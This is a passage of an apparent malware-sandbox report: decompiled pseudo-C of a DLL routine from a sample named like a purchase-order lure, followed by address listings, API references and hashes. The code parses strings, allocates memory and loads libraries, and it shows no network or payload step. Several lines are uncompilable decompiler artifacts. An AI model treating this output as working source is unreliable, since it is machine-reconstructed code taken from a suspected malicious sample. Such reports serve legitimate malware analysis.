                                                                      															_push(2);
                                                                      															goto L108;
                                                                      														case 0xf:
                                                                      															_push(3);
                                                                      															goto L108;
                                                                      														case 0x10:
                                                                      															_push(0x17);
                                                                      															L128:
                                                                      															_pop(__ebx);
                                                                      															goto L93;
                                                                      														case 0x11:
                                                                      															__eax =  &_v12;
                                                                      															__eax = E10001A9F( &_v12);
                                                                      															__ebx = __eax;
                                                                      															__ebx = __eax + 1;
                                                                      															__eflags = __ebx - 0xb;
                                                                      															if(__ebx < 0xb) {
                                                                      																__ebx = __ebx + 0xa;
                                                                      															}
                                                                      															goto L92;
                                                                      														case 0x12:
                                                                      															__ebx = 0xffffffff;
                                                                      															goto L93;
                                                                      														case 0x13:
                                                                      															_v48 = _v48 + 1;
                                                                      															_push(4);
                                                                      															_pop(__eax);
                                                                      															goto L85;
                                                                      														case 0x14:
                                                                      															__eax = 0;
                                                                      															__eflags = 0;
                                                                      															goto L85;
                                                                      														case 0x15:
                                                                      															_push(4);
                                                                      															L108:
                                                                      															_pop(__eax);
                                                                      															L85:
                                                                      															__edi = _v16;
                                                                      															__ecx =  *(0x1000305c + __eax * 4);
                                                                      															__edi = _v16 << 5;
                                                                      															__edx = 0;
                                                                      															__edi = (_v16 << 5) + __esi;
                                                                      															__edx = 1;
                                                                      															__eflags = _v8 - 0xffffffff;
                                                                      															_v40 = 1;
                                                                      															 *(__edi + 0x1018) = __eax;
                                                                      															if(_v8 == 0xffffffff) {
                                                                      																L87:
                                                                      																__ecx = __edx;
                                                                      															} else {
                                                                      																__eflags = __ecx;
                                                                      																if(__ecx <= 0) {
                                                                      																	goto L87;
                                                                      																}
                                                                      															}
                                                                      															__eflags = _v8 - __edx;
                                                                      															 *(__edi + 0x1028) = __ecx;
                                                                      															if (_v8 != __edx) goto L91;
                                                                      															_push(cs);
                                                                      														case 0x16:
                                                                      															_t246 =  *(_t303 + 0x1014);
                                                                      															__eflags = _t246 - _v16;
                                                                      															if(_t246 > _v16) {
                                                                      																_v16 = _t246;
                                                                      															}
                                                                      															_v8 = _v8 & 0x00000000;
                                                                      															_v20 = _v20 & 0x00000000;
                                                                      															_v36 - 3 = _t246 - (_v36 == 3);
                                                                      															if(_t246 != _v36 == 3) {
                                                                      																L79:
                                                                      																_v40 = 1;
                                                                      															}
                                                                      															goto L61;
                                                                      														case 0x17:
                                                                      															__eax =  &_v12;
                                                                      															__eax = E10001A9F( &_v12);
                                                                      															__ebx = __eax;
                                                                      															__ebx = __eax + 1;
                                                                      															L92:
                                                                      															__eflags = __ebx;
                                                                      															if(__ebx == 0) {
                                                                      																goto L61;
                                                                      															} else {
                                                                      																L93:
                                                                      																__eflags = _v20;
                                                                      																_v40 = 1;
                                                                      																if(_v20 == 0) {
                                                                      																	_v16 = _v16 << 5;
                                                                      																	_t141 = __esi + 0x1030; // 0x1030
                                                                      																	__edi = (_v16 << 5) + _t141;
                                                                      																	__eax =  *__edi;
                                                                      																	__eflags = __eax - 0xffffffff;
                                                                      																	if(__eax <= 0xffffffff) {
                                                                      																		L96:
                                                                      																		__eax = GlobalFree(__eax);
                                                                      																	} else {
                                                                      																		__eflags = __eax - 0x19;
                                                                      																		if(__eax > 0x19) {
                                                                      																			goto L96;
                                                                      																		}
                                                                      																	}
                                                                      																	 *__edi = __ebx;
                                                                      																}
                                                                      																__eflags = _v20 - 1;
                                                                      																if(_v20 == 1) {
                                                                      																	__eax = _v16;
                                                                      																	__eax = _v16 << 5;
                                                                      																	__eflags = __eax;
                                                                      																	 *(__eax + __esi + 0x102c) = __ebx;
                                                                      																}
                                                                      																goto L100;
                                                                      															}
                                                                      															goto L157;
                                                                      														case 0x18:
                                                                      															goto L61;
                                                                      													}
                                                                      												}
                                                                      												L157:
                                                                      											} else {
                                                                      												_t247 = _t243 - 1;
                                                                      												__eflags = _t247;
                                                                      												if(_t247 == 0) {
                                                                      													_v16 = _t269;
                                                                      													goto L74;
                                                                      												} else {
                                                                      													__eflags = _t247 != 1;
                                                                      													if(_t247 != 1) {
                                                                      														L142:
                                                                      														_v28 =  &(_v28[1]);
                                                                      														 *_v28 = _t289;
                                                                      													} else {
                                                                      														_t250 = _t273 - 0x21;
                                                                      														__eflags = _t250;
                                                                      														if(_t250 == 0) {
                                                                      															_v8 =  ~_v8;
                                                                      														} else {
                                                                      															_t251 = _t250 - 0x42;
                                                                      															__eflags = _t251;
                                                                      															if(_t251 == 0) {
                                                                      																goto L57;
                                                                      															} else {
                                                                      																_t256 = _t251;
                                                                      																__eflags = _t256;
                                                                      																if(_t256 == 0) {
                                                                      																	_push(0x20);
                                                                      																	goto L56;
                                                                      																} else {
                                                                      																	_t257 = _t256 - 9;
                                                                      																	__eflags = _t257;
                                                                      																	if(_t257 == 0) {
                                                                      																		_push(8);
                                                                      																		goto L56;
                                                                      																	} else {
                                                                      																		_t258 = _t257 - 4;
                                                                      																		__eflags = _t258;
                                                                      																		if(_t258 == 0) {
                                                                      																			_push(4);
                                                                      																			goto L56;
                                                                      																		} else {
                                                                      																			_t259 = _t258 - 1;
                                                                      																			__eflags = _t259;
                                                                      																			if(_t259 == 0) {
                                                                      																				_push(0x10);
                                                                      																				goto L56;
                                                                      																			} else {
                                                                      																				__eflags = _t259 == 0;
                                                                      																				if(_t259 == 0) {
                                                                      																					_push(0x40);
                                                                      																					L56:
                                                                      																					_pop(1);
                                                                      																					L57:
                                                                      																					__eflags = _v8 - 1;
                                                                      																					if(_v8 != 1) {
                                                                      																						_t92 = _t303 + 0x1010;
                                                                      																						 *_t92 =  *(_t303 + 0x1010) &  !0x00000001;
                                                                      																						__eflags =  *_t92;
                                                                      																					} else {
                                                                      																						 *(_t303 + 0x1010) =  *(_t303 + 0x1010) | 1;
                                                                      																					}
                                                                      																					_v8 = 1;
                                                                      																				}
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      														L61:
                                                                      														_t291 = _v12;
                                                                      														_v28 = _v24;
                                                                      														_t269 = 0;
                                                                      														__eflags = 0;
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      										_t301 = _t291 + 2;
                                                                      										__eflags = _t301;
                                                                      										_v12 = _t301;
                                                                      									} else {
                                                                      										_v32 = 3;
                                                                      										_v8 = 1;
                                                                      										L17:
                                                                      										_t194 = _v56 - _t269;
                                                                      										if(_t194 == 0) {
                                                                      											__eflags = _t303 - _t269;
                                                                      											 *_v28 = _t269;
                                                                      											if(_t303 == _t269) {
                                                                      												_t230 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                      												_t303 = _t230;
                                                                      												 *(_t303 + 0x1010) = _t269;
                                                                      												 *(_t303 + 0x1014) = _t269;
                                                                      											}
                                                                      											_t274 = _v36;
                                                                      											_t43 = _t303 + 8; // 0x8
                                                                      											_t196 = _t43;
                                                                      											_t44 = _t303 + 0x808; // 0x808
                                                                      											_t292 = _t44;
                                                                      											 *_t303 = _t274;
                                                                      											_t275 = _t274 - _t269;
                                                                      											__eflags = _t275;
                                                                      											 *_t196 = _t269;
                                                                      											 *_t292 = _t269;
                                                                      											 *(_t303 + 0x1008) = _t269;
                                                                      											 *(_t303 + 0x100c) = _t269;
                                                                      											 *(_t303 + 4) = _t269;
                                                                      											if(_t275 == 0) {
                                                                      												__eflags = _v28 - _v24;
                                                                      												if(_v28 != _v24) {
                                                                      													_t299 = 0;
                                                                      													GlobalFree(_t303);
                                                                      													_t303 = E10001311(_v24);
                                                                      													__eflags = _t303 - _t269;
                                                                      													if(_t303 != _t269) {
                                                                      														while(1) {
                                                                      															_t224 =  *(_t303 + 0x1ca0);
                                                                      															__eflags = _t224 - _t269;
                                                                      															if(_t224 == _t269) {
                                                                      																break;
                                                                      															}
                                                                      															_t299 = _t303;
                                                                      															_t303 = _t224;
                                                                      															__eflags = _t303 - _t269;
                                                                      															if(_t303 != _t269) {
                                                                      																continue;
                                                                      															}
                                                                      															break;
                                                                      														}
                                                                      														__eflags = _t299 - _t269;
                                                                      														if(_t299 != _t269) {
                                                                      															 *(_t299 + 0x1ca0) = _t269;
                                                                      														}
                                                                      														_t225 =  *(_t303 + 0x1010);
                                                                      														__eflags = _t225 & 0x00000008;
                                                                      														if((_t225 & 0x00000008) == 0) {
                                                                      															_t226 = _t225 | 0x00000002;
                                                                      															__eflags = _t226;
                                                                      															 *(_t303 + 0x1010) = _t226;
                                                                      														} else {
                                                                      															_t303 = E1000158F(_t303);
                                                                      															 *(_t303 + 0x1010) =  *(_t303 + 0x1010) & 0xfffffff5;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												_t282 = _t275 - 1;
                                                                      												__eflags = _t282;
                                                                      												if(_t282 == 0) {
                                                                      													L28:
                                                                      													lstrcpyW(_t196, _v44);
                                                                      													goto L29;
                                                                      												} else {
                                                                      													_t283 = _t282 - 1;
                                                                      													__eflags = _t283;
                                                                      													if(_t283 == 0) {
                                                                      														L29:
                                                                      														lstrcpyW(_t292, _v24);
                                                                      													} else {
                                                                      														__eflags = _t283 == 1;
                                                                      														if(_t283 == 1) {
                                                                      															goto L28;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											if(_t194 == 1) {
                                                                      												_t232 = _v16;
                                                                      												if(_v40 == _t269) {
                                                                      													_t232 = _t232 - 1;
                                                                      												}
                                                                      												 *(_t303 + 0x1014) = _t232;
                                                                      											}
                                                                      										}
                                                                      										_v12 = _v12 + 2;
                                                                      										_v28 = _v24;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(_v32 != 0xffffffff) {
                                                                      						_t291 = _v12;
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				GlobalFree(_v52);
                                                                      				GlobalFree(_v24);
                                                                      				GlobalFree(_v44);
                                                                      				if(_t303 == _t269 ||  *(_t303 + 0x100c) != _t269) {
                                                                      					L156:
                                                                      					return _t303;
                                                                      				} else {
                                                                      					_t204 =  *_t303 - 1;
                                                                      					if(_t204 == 0) {
                                                                      						_t178 = _t303 + 8; // 0x8
                                                                      						_t295 = _t178;
                                                                      						__eflags =  *_t295 - _t269;
                                                                      						if( *_t295 != _t269) {
                                                                      							_t205 = GetModuleHandleW(_t295);
                                                                      							__eflags = _t205 - _t269;
                                                                      							 *(_t303 + 0x1008) = _t205;
                                                                      							if(_t205 != _t269) {
                                                                      								L151:
                                                                      								_t206 = E100015FF( *(_t303 + 0x1008), _t303 + 0x808);
                                                                      								[far dword [ecx+0x3b]();
                                                                      								return _t206;
                                                                      							} else {
                                                                      								_t207 = LoadLibraryW(_t295);
                                                                      								__eflags = _t207 - _t269;
                                                                      								 *(_t303 + 0x1008) = _t207;
                                                                      								if(_t207 == _t269) {
                                                                      									goto L155;
                                                                      								} else {
                                                                      									goto L151;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t179 = _t303 + 0x808; // 0x808
                                                                      							_t209 = E10001311(_t179);
                                                                      							 *(_t303 + 0x100c) = _t209;
                                                                      							__eflags = _t209 - _t269;
                                                                      							if (__eflags != 0) goto L156;
                                                                      							__eflags = _t209 + 0x83;
                                                                      						}
                                                                      					} else {
                                                                      						_t211 = _t204 - 1;
                                                                      						if(_t211 == 0) {
                                                                      							_t176 = _t303 + 0x808; // 0x808
                                                                      							_t212 = _t176;
                                                                      							__eflags =  *_t212 - _t269;
                                                                      							if( *_t212 != _t269) {
                                                                      								_t213 = E10001311(_t212);
                                                                      								goto L145;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t211 == 1) {
                                                                      								_t80 = _t303 + 8; // 0x8
                                                                      								_t271 = _t80;
                                                                      								_t297 = E10001311(_t80);
                                                                      								 *(_t303 + 0x1008) = _t297;
                                                                      								if(_t297 == 0) {
                                                                      									L155:
                                                                      									_t185 = _t303 + 4;
                                                                      									 *_t185 =  *(_t303 + 4) | 0xffffffff;
                                                                      									__eflags =  *_t185;
                                                                      								} else {
                                                                      									 *(_t303 + 0x104c) =  *(_t303 + 0x104c) & 0x00000000;
                                                                      									 *((intOrPtr*)(_t303 + 0x1050)) = E1000122C(_t271);
                                                                      									 *(_t303 + 0x103c) =  *(_t303 + 0x103c) & 0x00000000;
                                                                      									 *((intOrPtr*)(_t303 + 0x1048)) = 1;
                                                                      									 *((intOrPtr*)(_t303 + 0x1038)) = 1;
                                                                      									_t89 = _t303 + 0x808; // 0x808
                                                                      									_t213 =  *(_t297->i + E10001311(_t89) * 4);
                                                                      									L145:
                                                                      									 *(_t303 + 0x100c) = _t213;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L156;
                                                                      					}
                                                                      				}
                                                                      				goto L157;
                                                                      			}






























































                                                                      0x10001b20
                                                                      0x10001b23
                                                                      0x10001b26
                                                                      0x10001b29
                                                                      0x10001b2c
                                                                      0x10001b2f
                                                                      0x10001b32
                                                                      0x10001b34
                                                                      0x10001b37
                                                                      0x10001b3c
                                                                      0x10001b3f
                                                                      0x10001b47
                                                                      0x10001b4f
                                                                      0x10001b51
                                                                      0x10001b54
                                                                      0x10001b5c
                                                                      0x10001b5c
                                                                      0x10001b61
                                                                      0x10001b64
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001b6e
                                                                      0x10001b71
                                                                      0x10001b76
                                                                      0x10001b78
                                                                      0x10001beb
                                                                      0x10001beb
                                                                      0x10001beb
                                                                      0x00000000
                                                                      0x10001b7a
                                                                      0x10001b7a
                                                                      0x10001b7d
                                                                      0x10001bce
                                                                      0x10001bd1
                                                                      0x10001be3
                                                                      0x10001be3
                                                                      0x10001be6
                                                                      0x00000000
                                                                      0x10001bd3
                                                                      0x10001bd3
                                                                      0x10001bd8
                                                                      0x00000000
                                                                      0x10001bda
                                                                      0x10001bda
                                                                      0x10001bdd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001bdd
                                                                      0x10001bd8
                                                                      0x10001b7f
                                                                      0x10001b7f
                                                                      0x10001b82
                                                                      0x10001bb1
                                                                      0x10001bb5
                                                                      0x10001bbc
                                                                      0x10001bc3
                                                                      0x10001bc6
                                                                      0x10001bc9
                                                                      0x00000000
                                                                      0x10001b84
                                                                      0x10001b84
                                                                      0x10001b85
                                                                      0x10001ba0
                                                                      0x10001ba7
                                                                      0x10001baa
                                                                      0x00000000
                                                                      0x10001b87
                                                                      0x10001b8a
                                                                      0x10001ced
                                                                      0x10001cf0
                                                                      0x10001cf0
                                                                      0x10001cf2
                                                                      0x10002048
                                                                      0x1000204b
                                                                      0x100020b2
                                                                      0x00000000
                                                                      0x1000204d
                                                                      0x1000204d
                                                                      0x10002050
                                                                      0x10002057
                                                                      0x10002057
                                                                      0x1000205b
                                                                      0x1000206f
                                                                      0x1000206f
                                                                      0x10002072
                                                                      0x10002076
                                                                      0x00000000
                                                                      0x10002078
                                                                      0x10002078
                                                                      0x1000207c
                                                                      0x00000000
                                                                      0x1000207e
                                                                      0x1000207e
                                                                      0x00000000
                                                                      0x1000207e
                                                                      0x1000207c
                                                                      0x1000205d
                                                                      0x1000205d
                                                                      0x10002060
                                                                      0x10002064
                                                                      0x00000000
                                                                      0x10002066
                                                                      0x10002066
                                                                      0x10002085
                                                                      0x10002085
                                                                      0x1000208b
                                                                      0x1000208e
                                                                      0x100020aa
                                                                      0x10002090
                                                                      0x10002099
                                                                      0x1000209c
                                                                      0x1000209c
                                                                      0x00000000
                                                                      0x1000208e
                                                                      0x10002064
                                                                      0x10002052
                                                                      0x10002052
                                                                      0x10002055
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002055
                                                                      0x10002050
                                                                      0x00000000
                                                                      0x10001cf8
                                                                      0x10001cf8
                                                                      0x10001cf8
                                                                      0x10001cf9
                                                                      0x10001e29
                                                                      0x10001e29
                                                                      0x10001e2e
                                                                      0x10001e31
                                                                      0x00000000
                                                                      0x10001e37
                                                                      0x10001e3e
                                                                      0x00000000
                                                                      0x10001fe5
                                                                      0x10001fe8
                                                                      0x10001feb
                                                                      0x10001feb
                                                                      0x10001fec
                                                                      0x10001fed
                                                                      0x10001ff0
                                                                      0x10001ff3
                                                                      0x10001ff6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ff8
                                                                      0x10001ff8
                                                                      0x10001ffc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002014
                                                                      0x10002017
                                                                      0x10002021
                                                                      0x00000000
                                                                      0x10001ffe
                                                                      0x10001ffe
                                                                      0x10002001
                                                                      0x10002003
                                                                      0x10002006
                                                                      0x10002008
                                                                      0x10002009
                                                                      0x10002009
                                                                      0x10002009
                                                                      0x1000200a
                                                                      0x1000200d
                                                                      0x10002010
                                                                      0x10002011
                                                                      0x10001feb
                                                                      0x10001fec
                                                                      0x10001fed
                                                                      0x10001ff0
                                                                      0x10001ff3
                                                                      0x10001ff6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ff6
                                                                      0x00000000
                                                                      0x10002001
                                                                      0x00000000
                                                                      0x10001e85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e91
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e78
                                                                      0x10001e7c
                                                                      0x10001e80
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001fb6
                                                                      0x10001fba
                                                                      0x00000000
                                                                      0x10001fc0
                                                                      0x10001fc0
                                                                      0x10001fc9
                                                                      0x10001fd0
                                                                      0x10001fd8
                                                                      0x00000000
                                                                      0x10001fdd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f53
                                                                      0x10001f53
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e9a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002040
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002030
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002034
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1000203c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f5b
                                                                      0x10001f5d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f63
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f67
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002038
                                                                      0x10002042
                                                                      0x10002042
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f86
                                                                      0x10001f8a
                                                                      0x10001f8f
                                                                      0x10001f92
                                                                      0x10001f93
                                                                      0x10001f96
                                                                      0x10001f9c
                                                                      0x10001f9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002028
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f6b
                                                                      0x10001f6e
                                                                      0x10001f70
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ea1
                                                                      0x10001ea1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f7a
                                                                      0x10001f80
                                                                      0x10001f80
                                                                      0x10001ea3
                                                                      0x10001ea3
                                                                      0x10001ea6
                                                                      0x10001ead
                                                                      0x10001eb0
                                                                      0x10001eb2
                                                                      0x10001eb4
                                                                      0x10001eb5
                                                                      0x10001eb9
                                                                      0x10001ebc
                                                                      0x10001ec2
                                                                      0x10001ec8
                                                                      0x10001ec8
                                                                      0x10001ec4
                                                                      0x10001ec4
                                                                      0x10001ec6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ec6
                                                                      0x10001eca
                                                                      0x10001ecd
                                                                      0x10001ed3
                                                                      0x10001ed4
                                                                      0x00000000
                                                                      0x10001e45
                                                                      0x10001e4b
                                                                      0x10001e4e
                                                                      0x10001e50
                                                                      0x10001e50
                                                                      0x10001e53
                                                                      0x10001e57
                                                                      0x10001e64
                                                                      0x10001e66
                                                                      0x10001e6c
                                                                      0x10001e6c
                                                                      0x10001e6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001fa4
                                                                      0x10001fa8
                                                                      0x10001fad
                                                                      0x10001fb0
                                                                      0x10001f09
                                                                      0x10001f09
                                                                      0x10001f0b
                                                                      0x00000000
                                                                      0x10001f11
                                                                      0x10001f11
                                                                      0x10001f11
                                                                      0x10001f15
                                                                      0x10001f1c
                                                                      0x10001f21
                                                                      0x10001f24
                                                                      0x10001f24
                                                                      0x10001f2b
                                                                      0x10001f2d
                                                                      0x10001f30
                                                                      0x10001f37
                                                                      0x10001f38
                                                                      0x10001f32
                                                                      0x10001f32
                                                                      0x10001f35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001f35
                                                                      0x10001f3e
                                                                      0x10001f3e
                                                                      0x10001f40
                                                                      0x10001f44
                                                                      0x10001f46
                                                                      0x10001f49
                                                                      0x10001f49
                                                                      0x10001f4c
                                                                      0x10001f4c
                                                                      0x00000000
                                                                      0x10001f44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001e3e
                                                                      0x00000000
                                                                      0x10001cff
                                                                      0x10001cff
                                                                      0x10001cff
                                                                      0x10001d00
                                                                      0x10001e26
                                                                      0x00000000
                                                                      0x10001d06
                                                                      0x10001d06
                                                                      0x10001d07
                                                                      0x100020be
                                                                      0x100020c1
                                                                      0x100020c5
                                                                      0x10001d0d
                                                                      0x10001d0f
                                                                      0x10001d0f
                                                                      0x10001d12
                                                                      0x10001d5d
                                                                      0x10001d14
                                                                      0x10001d14
                                                                      0x10001d14
                                                                      0x10001d17
                                                                      0x00000000
                                                                      0x10001d19
                                                                      0x10001d1a
                                                                      0x10001d1a
                                                                      0x10001d1b
                                                                      0x10001d3e
                                                                      0x00000000
                                                                      0x10001d1d
                                                                      0x10001d1d
                                                                      0x10001d1d
                                                                      0x10001d20
                                                                      0x10001d3a
                                                                      0x00000000
                                                                      0x10001d22
                                                                      0x10001d22
                                                                      0x10001d22
                                                                      0x10001d25
                                                                      0x10001d36
                                                                      0x00000000
                                                                      0x10001d27
                                                                      0x10001d27
                                                                      0x10001d27
                                                                      0x10001d28
                                                                      0x10001d32
                                                                      0x00000000
                                                                      0x10001d2a
                                                                      0x10001d2b
                                                                      0x10001d2c
                                                                      0x10001d2e
                                                                      0x10001d40
                                                                      0x10001d40
                                                                      0x10001d41
                                                                      0x10001d44
                                                                      0x10001d47
                                                                      0x10001e18
                                                                      0x10001e18
                                                                      0x10001e18
                                                                      0x10001d4d
                                                                      0x10001d4d
                                                                      0x10001d4d
                                                                      0x10001e1e
                                                                      0x10001e1e
                                                                      0x10001d2c
                                                                      0x10001d28
                                                                      0x10001d25
                                                                      0x10001d20
                                                                      0x10001d1b
                                                                      0x10001d17
                                                                      0x10001d60
                                                                      0x10001d63
                                                                      0x10001d66
                                                                      0x10001d69
                                                                      0x10001d69
                                                                      0x10001d69
                                                                      0x10001d07
                                                                      0x10001d00
                                                                      0x10001cf9
                                                                      0x10001d6c
                                                                      0x10001d6c
                                                                      0x10001d6d
                                                                      0x10001b90
                                                                      0x10001b90
                                                                      0x10001b97
                                                                      0x10001bef
                                                                      0x10001bf2
                                                                      0x10001bf4
                                                                      0x10001c16
                                                                      0x10001c18
                                                                      0x10001c1b
                                                                      0x10001c24
                                                                      0x10001c2a
                                                                      0x10001c2c
                                                                      0x10001c32
                                                                      0x10001c32
                                                                      0x10001c38
                                                                      0x10001c3b
                                                                      0x10001c3b
                                                                      0x10001c3e
                                                                      0x10001c3e
                                                                      0x10001c44
                                                                      0x10001c46
                                                                      0x10001c46
                                                                      0x10001c48
                                                                      0x10001c4b
                                                                      0x10001c4e
                                                                      0x10001c54
                                                                      0x10001c5a
                                                                      0x10001c5d
                                                                      0x10001c81
                                                                      0x10001c84
                                                                      0x10001c87
                                                                      0x10001c89
                                                                      0x10001c97
                                                                      0x10001c9a
                                                                      0x10001c9c
                                                                      0x10001c9e
                                                                      0x10001c9e
                                                                      0x10001ca4
                                                                      0x10001ca6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001ca8
                                                                      0x10001caa
                                                                      0x10001cac
                                                                      0x10001cae
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001cae
                                                                      0x10001cb0
                                                                      0x10001cb2
                                                                      0x10001cb4
                                                                      0x10001cb4
                                                                      0x10001cba
                                                                      0x10001cc0
                                                                      0x10001cc2
                                                                      0x10001cd6
                                                                      0x10001cd6
                                                                      0x10001cd8
                                                                      0x10001cc4
                                                                      0x10001cca
                                                                      0x10001ccd
                                                                      0x10001ccd
                                                                      0x10001cc2
                                                                      0x10001c9c
                                                                      0x10001c5f
                                                                      0x10001c5f
                                                                      0x10001c5f
                                                                      0x10001c60
                                                                      0x10001c68
                                                                      0x10001c6c
                                                                      0x00000000
                                                                      0x10001c62
                                                                      0x10001c62
                                                                      0x10001c62
                                                                      0x10001c63
                                                                      0x10001c72
                                                                      0x10001c76
                                                                      0x10001c65
                                                                      0x10001c65
                                                                      0x10001c66
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10001c66
                                                                      0x10001c63
                                                                      0x10001c60
                                                                      0x10001bf6
                                                                      0x10001bf7
                                                                      0x10001c00
                                                                      0x10001c03
                                                                      0x10001c10
                                                                      0x10001c10
                                                                      0x10001c05
                                                                      0x10001c05
                                                                      0x10001bf7
                                                                      0x10001ce1
                                                                      0x10001ce5
                                                                      0x10001ce5
                                                                      0x10001b8a
                                                                      0x10001b85
                                                                      0x10001b82
                                                                      0x10001b7d
                                                                      0x10001d74
                                                                      0x10001b59
                                                                      0x00000000
                                                                      0x10001b59
                                                                      0x00000000
                                                                      0x10001d74
                                                                      0x10001d83
                                                                      0x10001d88
                                                                      0x10001d8d
                                                                      0x10001d91
                                                                      0x100021c5
                                                                      0x100021cb
                                                                      0x10001da3
                                                                      0x10001da5
                                                                      0x10001da6
                                                                      0x100020ee
                                                                      0x100020ee
                                                                      0x100020f1
                                                                      0x100020f4
                                                                      0x10002111
                                                                      0x10002117
                                                                      0x10002119
                                                                      0x1000211f
                                                                      0x10002136
                                                                      0x10002143
                                                                      0x10002147
                                                                      0x1000214a
                                                                      0x10002121
                                                                      0x10002122
                                                                      0x10002128
                                                                      0x1000212a
                                                                      0x10002130
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10002130
                                                                      0x100020f6
                                                                      0x100020f6
                                                                      0x100020fd
                                                                      0x10002103
                                                                      0x10002109
                                                                      0x100021bf
                                                                      0x100021c0
                                                                      0x100021c0
                                                                      0x10001dac
                                                                      0x10001dac
                                                                      0x10001dad
                                                                      0x100020cd
                                                                      0x100020cd
                                                                      0x100020d3
                                                                      0x100020d6
                                                                      0x100020dd
                                                                      0x00000000
                                                                      0x100020dd
                                                                      0x10001db3
                                                                      0x10001db4
                                                                      0x10001dba
                                                                      0x10001dba
                                                                      0x10001dc3
                                                                      0x10001dc8
                                                                      0x10001dce
                                                                      0x100021c1
                                                                      0x100021c1
                                                                      0x100021c1
                                                                      0x100021c1
                                                                      0x10001dd4
                                                                      0x10001dd4
                                                                      0x10001de1
                                                                      0x10001de7
                                                                      0x10001df1
                                                                      0x10001df7
                                                                      0x10001dff
                                                                      0x10001e0f
                                                                      0x100020e2
                                                                      0x100020e3
                                                                      0x100020e3
                                                                      0x10001dce
                                                                      0x10001db4
                                                                      0x00000000
                                                                      0x10001dad
                                                                      0x10001da6
                                                                      0x00000000

                                                                      APIs
                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                      • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                      • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                      • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.7117138785.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000001.00000002.7117107508.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117175931.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.7117207358.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_10000000_PO No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloclstrcpy
                                                                      • String ID:
                                                                      • API String ID: 852173138-0
                                                                      • Opcode ID: 9f65c1ae0a12d57398a48fba67ce4c8235f8e120282e536a4e0262c162c532c7
                                                                      • Instruction ID: c10f6f77aca69f092c34fa724e26260c0ab6fe1606c52e512692b09d5dce10e0
                                                                      • Opcode Fuzzy Hash: 9f65c1ae0a12d57398a48fba67ce4c8235f8e120282e536a4e0262c162c532c7
                                                                      • Instruction Fuzzy Hash: A8028A71D0424ADFEB20CFA4C8806EEB7F0FF083D4F61452AE565A7298D774AA80DB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
